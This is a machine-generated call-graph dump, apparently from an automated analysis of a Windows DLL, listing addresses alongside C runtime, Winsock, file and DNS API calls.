21509->21511 21510->21480 21512 6ced23f2 21511->21512 21513 6cecd645 __wsopen_helper 9 API calls 21512->21513 21514 6ced23fd 21513->21514 21514->21480 21516 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 21515->21516 21517 6ced6bef 21516->21517 21517->21480 21519 6ced867d 21518->21519 21521 6ced868a 21518->21521 21520 6cece5ab __wsopen_helper 106 API calls 21519->21520 21522 6ced8682 21520->21522 21523 6ced8696 21521->21523 21524 6cece5ab __wsopen_helper 106 API calls 21521->21524 21522->21504 21523->21504 21525 6ced86b7 21524->21525 21526 6cecd645 __wsopen_helper 9 API calls 21525->21526 21526->21522 21528 6ced1204 __malloc_crt 106 API calls 21527->21528 21529 6ced884a 21528->21529 21529->21507 21531 6ced2d27 __wsopen_helper 21530->21531 21532 6ced2d4b 21531->21532 21533 6ced2d34 21531->21533 21535 6ced2dea 21532->21535 21537 6ced2d5f 21532->21537 21534 6cece577 __free_osfhnd 106 API calls 21533->21534 21536 6ced2d39 21534->21536 21538 6cece577 __free_osfhnd 106 API calls 21535->21538 21539 6cece5ab __wsopen_helper 106 API calls 21536->21539 21540 6ced2d7d 21537->21540 21541 6ced2d87 21537->21541 21542 6ced2d82 21538->21542 21544 6ced2d40 __wsopen_helper 21539->21544 21545 6cece577 __free_osfhnd 106 API calls 21540->21545 21583 6ced9a37 21541->21583 21547 6cece5ab __wsopen_helper 106 API calls 21542->21547 21544->21503 21545->21542 21546 6ced2d8d 21548 6ced2da0 21546->21548 21549 6ced2db3 21546->21549 21550 6ced2df6 21547->21550 21592 6ced2e0a 21548->21592 21553 6cece5ab __wsopen_helper 106 API calls 21549->21553 21552 6cecd645 __wsopen_helper 9 API calls 21550->21552 21552->21544 21555 6ced2db8 21553->21555 21554 6ced2dac 21651 6ced2de2 21554->21651 21556 6cece577 __free_osfhnd 106 API calls 21555->21556 21556->21554 21559 6ced86d2 __wsopen_helper 21558->21559 21560 6ced86fb 21559->21560 21561 6ced86e3 21559->21561 21563 6ced87a0 21560->21563 21568 6ced8730 21560->21568 21562 6cece577 __free_osfhnd 106 API calls 21561->21562 21564 6ced86e8 21562->21564 21565 6cece577 __free_osfhnd 106 API calls 21563->21565 21566 6cece5ab __wsopen_helper 106 API calls 21564->21566 21567 6ced87a5 21565->21567 21569 6ced86f0 __wsopen_helper 21566->21569 21570 6cece5ab __wsopen_helper 106 API calls 21567->21570 21571 6ced9a37 ___lock_fhandle 107 API calls 21568->21571 21569->21503 21572 6ced87ad 21570->21572 21573 6ced8736 21571->21573 21574 6cecd645 __wsopen_helper 9 API calls 21572->21574 21575 6ced874c 21573->21575 21576 6ced8764 21573->21576 21574->21569 21578 6ced87c2 __lseeki64_nolock 108 API calls 21575->21578 21577 6cece5ab __wsopen_helper 106 API calls 21576->21577 21579 6ced8769 21577->21579 21581 6ced875b 21578->21581 21580 6cece577 __free_osfhnd 106 API calls 21579->21580 21580->21581 21684 6ced8798 21581->21684 21584 6ced9a43 __wsopen_helper 21583->21584 21585 6ced9a92 EnterCriticalSection 21584->21585 21587 6ced103d __lock 106 API calls 21584->21587 21586 6ced9ab8 __wsopen_helper 21585->21586 21586->21546 21588 6ced9a68 21587->21588 21589 6ced9a80 21588->21589 21591 6ced170c __mtinitlocknum InitializeCriticalSectionAndSpinCount 21588->21591 21654 6ced9abc 21589->21654 21591->21589 21593 6ced2e17 __write_nolock 21592->21593 21594 6ced2e75 21593->21594 21595 6ced2e56 21593->21595 21626 6ced2e4b 21593->21626 21600 6ced2ecd 21594->21600 21601 6ced2eb1 21594->21601 21597 6cece577 __free_osfhnd 106 API calls 21595->21597 21596 6ceccc9b _$I10_OUTPUT 6 API calls 21598 6ced366b 21596->21598 21599 6ced2e5b 21597->21599 21598->21554 21602 6cece5ab __wsopen_helper 106 API calls 21599->21602 21603 6ced2ee6 21600->21603 21658 6ced87c2 21600->21658 21604 6cece577 __free_osfhnd 106 API calls 21601->21604 21605 6ced2e62 21602->21605 21607 6ced8672 __flsbuf 106 API calls 21603->21607 21608 6ced2eb6 21604->21608 21610 6cecd645 __wsopen_helper 9 API calls 21605->21610 21611 6ced2ef4 21607->21611 21609 6cece5ab __wsopen_helper 106 API calls 21608->21609 21612 6ced2ebd 21609->21612 21610->21626 21613 6ced324d 21611->21613 21619 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 21611->21619 21614 6cecd645 __wsopen_helper 9 API calls 21612->21614 21615 6ced326b 21613->21615 21616 6ced35e0 WriteFile 21613->21616 21614->21626 21617 6ced338f 21615->21617 21624 6ced3281 21615->21624 21618 6ced3240 GetLastError 21616->21618 21628 6ced320d 21616->21628 21629 6ced339a 21617->21629 21643 6ced3484 21617->21643 21618->21628 21621 6ced2f20 GetConsoleMode 21619->21621 21620 6ced3619 21620->21626 21621->21613 21622 6ced2f5f 21621->21622 21622->21613 21623 6ced2f6f GetConsoleCP 21622->21623 21623->21620 21624->21620 21625 6ced32f0 WriteFile 21624->21625 21624->21628 21625->21618 21625->21624 21626->21596 21628->21620 21628->21626 21631 6ced336d 21628->21631 21629->21620 21629->21628 21643->21620 21643->21628 21683 6ced9ddd LeaveCriticalSection 21651->21683 21653 6ced2de8 21653->21544 21657 6ced11a7 LeaveCriticalSection 21654->21657 21656 6ced9ac3 21656->21585 21657->21656 21670 6ced9cf4 21658->21670 21660 6ced87d2 21661 6ced87eb SetFilePointerEx 21660->21661 21662 6ced87da 21660->21662 21664 6ced8803 GetLastError 21661->21664 21665 6ced87df 21661->21665 21663 6cece5ab __wsopen_helper 106 API calls 21662->21663 21663->21665 21665->21603 21671 6ced9cff 21670->21671 21672 6ced9d14 21670->21672 21673 6cece577 __free_osfhnd 106 API calls 21671->21673 21675 6cece577 __free_osfhnd 106 API calls 21672->21675 21677 6ced9d39 21672->21677 21674 6ced9d04 21673->21674 21676 6cece5ab __wsopen_helper 106 API calls 21674->21676 21678 6ced9d43 21675->21678 21680 6ced9d0c 21676->21680 21677->21660 21679 6cece5ab __wsopen_helper 106 API calls 21678->21679 21681 6ced9d4b 21679->21681 21680->21660 21683->21653 21687 6ced9ddd LeaveCriticalSection 21684->21687 21686 6ced879e 21686->21569 21687->21686 21699 6ceb36e7 WSASetLastError 21688->21699 21691 6ceb36e7 108 API calls 21692 6ceb454e 21691->21692 21693 6ceb19a9 21692->21693 21694 6ceb19b3 __EH_prolog 21693->21694 21695 6ceb19fe 21694->21695 21696 6cecac43 std::exception::exception 106 API calls 21694->21696 21695->20058 21697 6ceb19d5 Mailbox 21696->21697 21715 6cebe615 21697->21715 21700 6ceb3721 WSAStringToAddressA 21699->21700 21701 6ceb3707 21699->21701 21703 6cebe8bd WSAGetLastError 21700->21703 21701->21700 21702 6ceb370c 21701->21702 21704 6cebe893 106 API calls 21702->21704 21705 6ceb3747 21703->21705 21708 6ceb3719 21704->21708 21707 6ceb3789 21705->21707 21709 6ceb3753 _memcmp 21705->21709 21706 6ceb376a 21710 6ceb37cf 21706->21710 21711 6cebe893 106 API calls 21706->21711 21707->21706 21713 6cec9270 Mailbox 106 API calls 21707->21713 21708->21691 21708->21692 21709->21706 21712 6cec9270 Mailbox 106 API calls 21709->21712 21710->21708 21714 6cec9270 Mailbox 106 API calls 21710->21714 21711->21710 21712->21706 21713->21706 21714->21708 21716 6cebe63b Mailbox 21715->21716 21723 6cec32b0 21716->21723 21718 6cebe648 21726 6cec3318 21718->21726 21721 6cecccaa __CxxThrowException@8 RaiseException 21722 6cebe679 21721->21722 21722->21695 21724 6cec007a Mailbox 106 API calls 21723->21724 21725 6cec32d8 Mailbox 21724->21725 21725->21718 21729 6cec43ec 21726->21729 21728 6cebe666 21728->21721 21730 6cec4414 21729->21730 21733 6cec0001 21730->21733 21732 6cec4448 Mailbox 21732->21728 21734 6cec007a Mailbox 106 API calls 21733->21734 21735 6cec0029 Mailbox 21734->21735 21735->21732 21738 6ceb4499 __EH_prolog 21736->21738 21737 6ceb44bb htonl htonl 21737->20202 21738->21737 21748 6cecac27 21738->21748 21743 6ceb44dd __EH_prolog 21742->21743 21744 6ceb44ff 21743->21744 21745 6cecac27 std::bad_exception::bad_exception 106 API calls 21743->21745 21744->20202 21746 6ceb44f2 21745->21746 21747 6cebec65 106 API calls 21746->21747 21747->21744 21749 6cecac43 std::exception::exception 106 API calls 21748->21749 21750 6ceb44ae 21749->21750 21751 6cebec65 21750->21751 21752 6cebec88 Mailbox 21751->21752 21759 6cec3486 21752->21759 21754 6cebec95 21762 6cec34ee 21754->21762 21757 6cecccaa __CxxThrowException@8 RaiseException 21758 6cebecc0 Concurrency::details::_TaskCollectionImpl::_Complete 21757->21758 21758->21737 21765 6cecac0c 21759->21765 21761 6cec34ae Mailbox 21761->21754 21768 6cec4743 21762->21768 21764 6cebecb0 21764->21757 21766 6cecac83 std::exception::exception 106 API calls 21765->21766 21767 6cecac1a 21766->21767 21767->21761 21769 6cec476b 21768->21769 21772 6cec054e 21769->21772 21771 6cec479f Mailbox 21771->21764 21773 6cecac0c std::bad_exception::bad_exception 106 API calls 21772->21773 21774 6cec0576 Mailbox 21773->21774 21774->21771 21776 6cebc87b 21775->21776 21799 6ceb3da2 21776->21799 21778 6cebc89d 21778->20211 21780 6ceb3073 21779->21780 21781 6ceb3086 WSASetLastError 21779->21781 21783 6cebe893 106 API calls 21780->21783 21866 6cebe8eb connect 21781->21866 21785 6ceb3082 21783->21785 21784 6ceb309f 21786 6cebe8bd WSAGetLastError 21784->21786 21788 6cebe869 106 API calls 21785->21788 21787 6ceb30a8 21786->21787 21787->21785 21789 6cec9270 Mailbox 106 API calls 21787->21789 21790 6ceb30c6 21788->21790 21789->21785 21792 6cebe869 106 API calls 21790->21792 21794 6ceb30e2 21790->21794 21792->21794 21795 6ceb3126 21794->21795 21867 6ceb3662 21794->21867 21795->20206 21798 6cec9270 Mailbox 106 API calls 21798->21795 21800 6ceb3dac __EH_prolog 21799->21800 21801 6ceb3dbb 21800->21801 21802 6ceb3dd9 21800->21802 21803 6cebe8ff 106 API calls 21801->21803 21821 6ceb34db WSASetLastError WSASocketA 21802->21821 21820 6ceb3dc7 21803->21820 21806 6ceb3e10 CreateIoCompletionPort 21807 6ceb3e28 GetLastError 21806->21807 21808 6ceb3e3e 21806->21808 21809 6cec9270 Mailbox 106 API calls 21807->21809 21810 6cec9270 Mailbox 106 API calls 21808->21810 21811 6ceb3e35 21809->21811 21810->21811 21812 6ceb3e89 21811->21812 21813 6ceb3e52 21811->21813 21846 6cebe9a7 21812->21846 21814 6cec9270 Mailbox 106 API calls 21813->21814 21815 6ceb3e6b 21814->21815 21828 6ceb2f6a 21815->21828 21818 6ceb3eb6 21819 6cec9270 Mailbox 106 API calls 21818->21819 21819->21820 21820->21778 21822 6cebe8bd WSAGetLastError 21821->21822 21823 6ceb3509 21822->21823 21824 6ceb3533 21823->21824 21825 6ceb3519 setsockopt 21823->21825 21826 6ceb352e 21823->21826 21824->21806 21824->21820 21825->21826 21827 6cec9270 Mailbox 106 API calls 21826->21827 21827->21824 21829 6ceb2f88 21828->21829 21845 6ceb3045 21828->21845 21831 6ceb2fbb WSASetLastError closesocket 21829->21831 21834 6cec9270 Mailbox 101 API calls 21829->21834 21830 6cec9270 Mailbox 101 API calls 21832 6ceb3052 21830->21832 21833 6cebe8bd WSAGetLastError 21831->21833 21832->21820 21835 6ceb2fd1 21833->21835 21836 6ceb2fa0 21834->21836 21835->21845 21859 6cebe869 21835->21859 21849 6ceb3542 21836->21849 21841 6ceb3015 ioctlsocket WSASetLastError closesocket 21843 6cebe8bd WSAGetLastError 21841->21843 21842 6cebe869 101 API calls 21844 6ceb3006 21842->21844 21843->21845 21844->21841 21844->21845 21845->21830 21845->21832 21863 6cec5547 21846->21863 21848 6cebe9c6 21848->21818 21850 6ceb355e WSASetLastError 21849->21850 21851 6ceb354d 21849->21851 21862 6cebe929 setsockopt 21850->21862 21852 6cebe893 105 API calls 21851->21852 21856 6ceb2fb8 21852->21856 21854 6ceb3585 21855 6cebe8bd WSAGetLastError 21854->21855 21857 6ceb358e 21855->21857 21856->21831 21857->21856 21858 6cec9270 Mailbox 105 API calls 21857->21858 21858->21856 21860 6ceb1c52 106 API calls 21859->21860 21861 6ceb2fe8 21860->21861 21861->21841 21861->21842 21862->21854 21864 6cecc29f Mailbox 106 API calls 21863->21864 21865 6cec5577 Mailbox 21864->21865 21865->21848 21866->21784 21868 6ceb3686 WSASetLastError select 21867->21868 21869 6ceb3676 21867->21869 21871 6cebe8bd WSAGetLastError 21868->21871 21870 6cebe893 106 API calls 21869->21870 21874 6ceb30f9 21870->21874 21872 6ceb36cc 21871->21872 21873 6cec9270 Mailbox 106 API calls 21872->21873 21872->21874 21873->21874 21874->21795 21875 6ceb35a6 21874->21875 21876 6ceb35c2 WSASetLastError 21875->21876 21877 6ceb35b1 21875->21877 21885 6cebe943 getsockopt 21876->21885 21878 6cebe893 106 API calls 21877->21878 21882 6ceb3119 21878->21882 21880 6ceb35e7 21881 6cebe8bd WSAGetLastError 21880->21881 21883 6ceb35f0 21881->21883 21882->21795 21882->21798 21883->21882 21884 6cec9270 Mailbox 106 API calls 21883->21884 21884->21882 21885->21880 21887 6cec7303 21886->21887 21888 6ceb33a7 108 API calls 21887->21888 21889 6cec733f 21888->21889 21889->20214 21891 6ceb395e __EH_prolog 21890->21891 21900 6ceb8bf5 21891->21900 21894 6cebe869 106 API calls 21895 6ceb3983 21894->21895 21904 6ceb39ae 21895->21904 21899 6ceb399d 21899->20226 21901 6ceb8c19 21900->21901 21920 6ceb1e60 EnterCriticalSection 21901->21920 21903 6ceb3970 21903->21894 21906 6ceb39b8 __EH_prolog 21904->21906 21907 6ceb39f8 21906->21907 21921 6ceb8f7e 21906->21921 21925 6ceb2747 21907->21925 21910 6ceb3a3a 21912 6ceb8de4 106 API calls 21910->21912 21911 6cec9270 Mailbox 106 API calls 21913 6ceb3a25 21911->21913 21914 6ceb3991 21912->21914 21915 6ceb332e 106 API calls 21913->21915 21916 6ceb8c4d 21914->21916 21915->21910 21917 6ceb8c78 21916->21917 21918 6ceb8c82 Mailbox 21916->21918 21974 6ceb1e68 LeaveCriticalSection 21917->21974 21918->21899 21920->21903 21924 6ceb8f97 Mailbox 21921->21924 21923 6ceb9040 21923->21906 21924->21923 21932 6cebabc0 21924->21932 21929 6ceb2751 Mailbox __EH_prolog 21925->21929 21926 6ceb27cb 21926->21910 21926->21911 21927 6ceb2765 PostQueuedCompletionStatus 21927->21929 21928 6ceb8bf5 EnterCriticalSection 21928->21929 21929->21926 21929->21927 21929->21928 21930 6ceb27a2 InterlockedExchange 21929->21930 21931 6ceb8c4d LeaveCriticalSection 21930->21931 21931->21929 21933 6cebabdc Mailbox 21932->21933 21936 6cebc03e 21933->21936 21937 6cebc04f 21936->21937 21938 6ceb8de4 106 API calls 21937->21938 21939 6cebc073 Mailbox 21938->21939 21942 6cebd01c 21939->21942 21944 6cebd03e Mailbox 21942->21944 21943 6cebace2 21943->21923 21944->21943 21945 6cebd11f 21944->21945 21948 6cecc113 21944->21948 21954 6cebe11f 21945->21954 21949 6cecc11f __wsopen_helper 21948->21949 21950 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 21949->21950 21951 6cecc124 21950->21951 21958 6ced2ccb 21951->21958 21955 6cebe14b 21954->21955 21956 6cebe130 21954->21956 21955->21943 21956->21955 21969 6cec8292 21956->21969 21959 6cecb7ae _abort DecodePointer 21958->21959 21960 6ced2cd0 21959->21960 21961 6ced2cdb 21960->21961 21962 6cecb7d7 _raise 105 API calls 21960->21962 21963 6ced2ce5 IsProcessorFeaturePresent 21961->21963 21964 6ced2d03 21961->21964 21962->21961 21965 6ced2cf0 21963->21965 21966 6ced0c3e _raise 105 API calls 21964->21966 21968 6cecd4e8 __call_reportfault 7 API calls 21965->21968 21967 6ced2d0d 21966->21967 21968->21964 21970 6cecac43 std::exception::exception 106 API calls 21969->21970 21971 6cec82aa 21970->21971 21972 6cecccaa __CxxThrowException@8 RaiseException 21971->21972 21973 6cec82bf 21972->21973 21974->21918 21982 6ceb3f84 21975->21982 21977 6ceb3bc2 21978 6ceb8bf5 EnterCriticalSection 21977->21978 21979 6ceb3bce 21978->21979 21980 6ceb8c4d LeaveCriticalSection 21979->21980 21981 6ceb3c03 21980->21981 21981->20234 21983 6ceb3f9a InterlockedCompareExchange 21982->21983 21984 6ceb3fb5 21982->21984 21983->21984 21985 6ceb3faa 21983->21985 21986 6cec9270 Mailbox 105 API calls 21984->21986 21987 6ceb3954 105 API calls 21985->21987 21988 6ceb3fbe 21986->21988 21987->21984 21989 6ceb2f6a 105 API calls 21988->21989 21990 6ceb3fd3 21989->21990 21990->21977 22020 6cecbe00 21991->22020 21993 6ceb5e15 21993->20241 21994 6cecc059 21993->21994 21995 6cecc065 __wsopen_helper 21994->21995 21996 6cecc093 __wsopen_helper 21995->21996 21997 6cecc09b 21995->21997 21998 6cecc083 21995->21998 21996->20243 22355 6ced1cf2 21997->22355 21999 6cece5ab __wsopen_helper 106 API calls 21998->21999 22001 6cecc088 21999->22001 22003 6cecd645 __wsopen_helper 9 API calls 22001->22003 22003->21996 22008 6cecc1e3 __wsopen_helper 22007->22008 22009 6cecc20f 22008->22009 22010 6cecc1f7 22008->22010 22013 6ced1cf2 __lock_file 107 API calls 22009->22013 22016 6cecc207 __wsopen_helper 22009->22016 22011 6cece5ab __wsopen_helper 106 API calls 22010->22011 22012 6cecc1fc 22011->22012 22014 6cecd645 __wsopen_helper 9 API calls 22012->22014 22015 6cecc221 22013->22015 22014->22016 22382 6cecc16b 22015->22382 22016->20241 22023 6cecbe0c __wsopen_helper 22020->22023 22021 6cecbe1e 22022 6cece5ab __wsopen_helper 106 API calls 22021->22022 22024 6cecbe23 22022->22024 22023->22021 22025 6cecbe4b 22023->22025 22026 6cecd645 __wsopen_helper 9 API calls 22024->22026 22039 6ced1dc8 22025->22039 22034 6cecbe2e __wsopen_helper @_EH4_CallFilterFunc@8 22026->22034 22028 6cecbe50 22029 6cecbe59 22028->22029 22030 6cecbe66 22028->22030 22031 6cece5ab __wsopen_helper 106 API calls 22029->22031 22032 6cecbe8f 22030->22032 22033 6cecbe6f 22030->22033 22031->22034 22054 6ced1ee7 22032->22054 22035 6cece5ab __wsopen_helper 106 API calls 22033->22035 22034->21993 22035->22034 22040 6ced1dd4 __wsopen_helper 22039->22040 22041 6ced103d __lock 106 API calls 22040->22041 22052 6ced1de2 22041->22052 22042 6ced1e56 22084 6ced1ede 22042->22084 22043 6ced1e5d 22044 6ced1204 __malloc_crt 106 API calls 22043->22044 22046 6ced1e64 22044->22046 22046->22042 22048 6ced170c __mtinitlocknum InitializeCriticalSectionAndSpinCount 22046->22048 22047 6ced1ed3 __wsopen_helper 22047->22028 22051 6ced1e8a EnterCriticalSection 22048->22051 22049 6ced10c5 __mtinitlocknum 106 API calls 22049->22052 22051->22042 22052->22042 22052->22043 22052->22049 22074 6ced1d31 22052->22074 22079 6ced1d9b 22052->22079 22055 6ced1f04 22054->22055 22056 6ced1f18 22055->22056 22070 6ced20bf 22055->22070 22089 6ced95fe 22055->22089 22057 6cece5ab __wsopen_helper 106 API calls 22056->22057 22058 6ced1f1d 22057->22058 22059 6cecd645 __wsopen_helper 9 API calls 22058->22059 22061 6cecbe9a 22059->22061 22060 6ced211b 22095 6ced95e0 22060->22095 22071 6cecbebc 22061->22071 22067 6ced972d __openfile 113 API calls 22068 6ced20d7 22067->22068 22069 6ced972d __openfile 113 API calls 22068->22069 22068->22070 22069->22070 22070->22056 22070->22060 22348 6ced1d61 22071->22348 22073 6cecbec2 22073->22034 22075 6ced1d3c 22074->22075 22076 6ced1d52 EnterCriticalSection 22074->22076 22077 6ced103d __lock 106 API calls 22075->22077 22076->22052 22078 6ced1d45 22077->22078 22078->22052 22080 6ced1dbc LeaveCriticalSection 22079->22080 22081 6ced1da9 22079->22081 22080->22052 22087 6ced11a7 LeaveCriticalSection 22081->22087 22083 6ced1db9 22083->22052 22088 6ced11a7 LeaveCriticalSection 22084->22088 22086 6ced1ee5 22086->22047 22087->22083 22088->22086 22098 6ced9616 22089->22098 22091 6ced2085 22091->22056 22092 6ced972d 22091->22092 22106 6ced9745 22092->22106 22141 6ced94c9 22095->22141 22097 6ced95f9 22097->22061 22099 6ced962b 22098->22099 22102 6ced9624 _strncmp 22098->22102 22100 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22099->22100 22101 6ced9638 22100->22101 22101->22102 22103 6cece5ab __wsopen_helper 106 API calls 22101->22103 22102->22091 22104 6ced966b 22103->22104 22105 6cecd645 __wsopen_helper 9 API calls 22104->22105 22105->22102 22107 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22106->22107 22108 6ced9758 22107->22108 22109 6ced976d 22108->22109 22110 6ced9783 22108->22110 22115 6ced20b8 22108->22115 22116 6cedc378 22109->22116 22112 6cece5ab __wsopen_helper 106 API calls 22110->22112 22110->22115 22113 6ced9799 22112->22113 22114 6cecd645 __wsopen_helper 9 API calls 22113->22114 22114->22115 22115->22067 22115->22070 22117 6cedc385 22116->22117 22123 6cedc3c6 22116->22123 22119 6cedc38b 22117->22119 22120 6cedc3a8 22117->22120 22122 6cece5ab __wsopen_helper 106 API calls 22119->22122 22120->22123 22124 6cedc3b2 22120->22124 22121 6cedc39b 22121->22115 22125 6cedc390 22122->22125 22130 6cedc3e3 22123->22130 22126 6cece5ab __wsopen_helper 106 API calls 22124->22126 22127 6cecd645 __wsopen_helper 9 API calls 22125->22127 22128 6cedc3b7 22126->22128 22127->22121 22129 6cecd645 __wsopen_helper 9 API calls 22128->22129 22129->22121 22131 6cedc42b ___ascii_strnicmp 22130->22131 22132 6cedc3f3 22130->22132 22131->22121 22133 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22132->22133 22134 6cedc401 22133->22134 22135 6cedc41b 22134->22135 22140 6cedc42d 22134->22140 22136 6cece5ab __wsopen_helper 106 API calls 22135->22136 22137 6cedc420 22136->22137 22138 6cecd645 __wsopen_helper 9 API calls 22137->22138 22138->22131 22139 6cece0ca 113 API calls __tolower_l 22139->22140 22140->22131 22140->22139 22143 6ced94d5 __wsopen_helper 22141->22143 22142 6ced94eb 22144 6cece5ab __wsopen_helper 106 API calls 22142->22144 22143->22142 22145 6ced9521 22143->22145 22146 6ced94f0 22144->22146 22152 6ced9592 22145->22152 22148 6cecd645 __wsopen_helper 9 API calls 22146->22148 22150 6ced94fa __wsopen_helper 22148->22150 22150->22097 22163 6ced0986 22152->22163 22155 6ced953d 22159 6ced9566 22155->22159 22160 6ced956c 22159->22160 22161 6ced9590 22159->22161 22347 6ced9ddd LeaveCriticalSection 22160->22347 22161->22150 22164 6ced09a9 22163->22164 22165 6ced0993 22163->22165 22164->22165 22168 6ced09b0 ___crtIsPackagedApp 22164->22168 22166 6cece5ab __wsopen_helper 106 API calls 22165->22166 22167 6ced0998 22166->22167 22169 6cecd645 __wsopen_helper 9 API calls 22167->22169 22170 6ced09b9 AreFileApisANSI 22168->22170 22171 6ced09c6 MultiByteToWideChar 22168->22171 22178 6ced09a2 22169->22178 22170->22171 22172 6ced09c3 22170->22172 22173 6ced09f1 22171->22173 22174 6ced09e0 GetLastError 22171->22174 22172->22171 22176 6ced1204 __malloc_crt 106 API calls 22173->22176 22175 6cece58a __dosmaperr 106 API calls 22174->22175 22175->22178 22177 6ced09f9 22176->22177 22177->22178 22179 6ced0a00 MultiByteToWideChar 22177->22179 22178->22155 22184 6cedbba4 22178->22184 22179->22178 22180 6ced0a16 GetLastError 22179->22180 22181 6cece58a __dosmaperr 106 API calls 22180->22181 22182 6ced0a22 22181->22182 22183 6cecb6e4 _free 106 API calls 22182->22183 22183->22178 22185 6cedbbc4 22184->22185 22253 6cedd77f 22185->22253 22187 6cecd655 __invoke_watson 8 API calls 22189 6cedbbe0 22190 6cedbc1a 22189->22190 22196 6cedbc3d 22189->22196 22246 6cedbd17 22189->22246 22191 6cece577 __free_osfhnd 106 API calls 22190->22191 22197 6cedbcfb 22196->22197 22202 6cedbcd9 22196->22202 22246->22187 22254 6cedd79e 22253->22254 22255 6cedd789 22253->22255 22254->22189 22256 6cece5ab __wsopen_helper 106 API calls 22255->22256 22257 6cedd78e 22256->22257 22258 6cecd645 __wsopen_helper 9 API calls 22257->22258 22347->22161 22349 6ced1d8f LeaveCriticalSection 22348->22349 22350 6ced1d70 22348->22350 22349->22073 22350->22349 22351 6ced1d77 22350->22351 22354 6ced11a7 LeaveCriticalSection 22351->22354 22353 6ced1d8c 22353->22073 22354->22353 22356 6ced1d24 EnterCriticalSection 22355->22356 22357 6ced1d02 22355->22357 22358 6cecc0a1 22356->22358 22357->22356 22359 6ced1d0a 22357->22359 22361 6cecbf00 22358->22361 22360 6ced103d __lock 106 API calls 22359->22360 22360->22358 22364 6cecbf0f 22361->22364 22369 6cecbf2d 22361->22369 22362 6cecbf1d 22363 6cece5ab __wsopen_helper 106 API calls 22362->22363 22366 6cecbf22 22363->22366 22364->22362 22365 6cecbf47 _memmove 22364->22365 22364->22369 22368 6cece651 __flsbuf 126 API calls 22365->22368 22365->22369 22371 6ced23e3 __output_l 106 API calls 22365->22371 22372 6ced2d1b __write 126 API calls 22365->22372 22376 6ced36b5 22365->22376 22367 6cecd645 __wsopen_helper 9 API calls 22366->22367 22367->22369 22368->22365 22373 6cecc0d3 22369->22373 22371->22365 22372->22365 22374 6ced1d61 __fsopen 2 API calls 22373->22374 22375 6cecc0d9 22374->22375 22375->21996 22377 6ced36c8 22376->22377 22381 6ced36ec 22376->22381 22378 6ced23e3 __output_l 106 API calls 22377->22378 22377->22381 22379 6ced36e5 22378->22379 22380 6ced2d1b __write 126 API calls 22379->22380 22380->22381 22381->22365 22383 6cecc18e 22382->22383 22384 6cecc17a 22382->22384 22387 6ced36b5 __flush 126 API calls 22383->22387 22396 6cecc18a 22383->22396 22385 6cece5ab __wsopen_helper 106 API calls 22384->22385 22386 6cecc17f 22385->22386 22388 6cecd645 __wsopen_helper 9 API calls 22386->22388 22389 6cecc19a 22387->22389 22388->22396 22401 6ced416b 22389->22401 22392 6ced23e3 __output_l 106 API calls 22393 6cecc1a8 22392->22393 22405 6ced3ff6 22393->22405 22395 6cecc1ae 22395->22396 22397 6cecb6e4 _free 106 API calls 22395->22397 22398 6cecc246 22396->22398 22397->22396 22399 6ced1d61 __fsopen 2 API calls 22398->22399 22400 6cecc24c 22399->22400 22400->22016 22402 6cecc1a2 22401->22402 22403 6ced4178 22401->22403 22402->22392 22403->22402 22404 6cecb6e4 _free 106 API calls 22403->22404 22404->22402 22406 6ced4002 __wsopen_helper 22405->22406 22407 6ced400f 22406->22407 22408 6ced4026 22406->22408 22409 6cece577 __free_osfhnd 106 API calls 22407->22409 22410 6ced40b1 22408->22410 22411 6ced4036 22408->22411 22413 6ced4014 22409->22413 22412 6cece577 __free_osfhnd 106 API calls 22410->22412 22414 6ced405e 22411->22414 22415 6ced4054 22411->22415 22416 6ced4059 22412->22416 22417 6cece5ab __wsopen_helper 106 API calls 22413->22417 22419 6ced9a37 ___lock_fhandle 107 API calls 22414->22419 22418 6cece577 __free_osfhnd 106 API calls 22415->22418 22420 6cece5ab __wsopen_helper 106 API calls 22416->22420 22427 6ced401b __wsopen_helper 22417->22427 22418->22416 22421 6ced4064 22419->22421 22422 6ced40bd 22420->22422 22423 6ced4077 22421->22423 22424 6ced4082 22421->22424 22425 6cecd645 __wsopen_helper 9 API calls 22422->22425 22426 6ced40d1 __close_nolock 109 API calls 22423->22426 22428 6cece5ab __wsopen_helper 106 API calls 22424->22428 22425->22427 22429 6ced407d 22426->22429 22427->22395 22428->22429 22431 6ced40a9 22429->22431 22434 6ced9ddd LeaveCriticalSection 22431->22434 22435 6cf0a5b0 22436 6cf0a542 CreateFileW 22435->22436 22438 6cf0a5b9 22435->22438 22436->22438 22439 6cf0a550 22440 6cf0e196 CreateFileW 22439->22440 22441 6cf03342 22442 6cf5b4a6 GetModuleFileNameA 22441->22442 22443 6ceb104d 22444 6cecbaf7 __cinit 106 API calls 22443->22444 22445 6ceb1058 22444->22445 22448 6ceb8baf 22445->22448 22453 6ceb1dbd InterlockedIncrement 22448->22453 22451 6ceb1067 22454 6ceb1ddb WSAStartup InterlockedExchange 22453->22454 22455 6ceb1e05 22453->22455 22454->22455 22455->22451 22456 6ceb1e1d InterlockedExchangeAdd 22455->22456 22457 6ceb1e4a 22456->22457 22458 6ceb1e32 22456->22458 22457->22451 22459 6cec9270 Mailbox 106 API calls 22458->22459 22460 6ceb1e3a 22459->22460 22462 6ceb1a0e 22460->22462 22463 6ceb1a18 __EH_prolog 22462->22463 22464 6ceb1a3b 22463->22464 22465 6ceb1b26 Mailbox 106 API calls 22463->22465 22464->22457 22466 6ceb1a2e 22465->22466 22467 6cebe615 106 API calls 22466->22467 22467->22464 22468 6cf02438 CreateFileA 22469 6cf5a589 22468->22469 22470 6cf024b9 22471 6cf0e1bd ReadFile 22470->22471 22472 6cf0256d 22473 6cf3bdbc DnsQuery_A 22472->22473 22474 6cecc462 22475 6cecc46b 22474->22475 22476 6cecc470 22474->22476 22488 6ced47b1 22475->22488 22480 6cecc485 22476->22480 22479 6cecc47e 22481 6cecc491 __wsopen_helper 22480->22481 22485 6cecc4df ___DllMainCRTStartup 22481->22485 22487 6cecc53c __wsopen_helper 22481->22487 22492 6cecc2f0 22481->22492 22483 6cecc519 22484 6cecc2f0 __CRT_INIT@12 176 API calls 22483->22484 22483->22487 22484->22487 22485->22483 22486 6cecc2f0 __CRT_INIT@12 176 API calls 22485->22486 22485->22487 22486->22483 22487->22479 22489 6ced47d4 22488->22489 22490 6ced47e1 GetSystemTimeAsFileTime GetCurrentThreadId 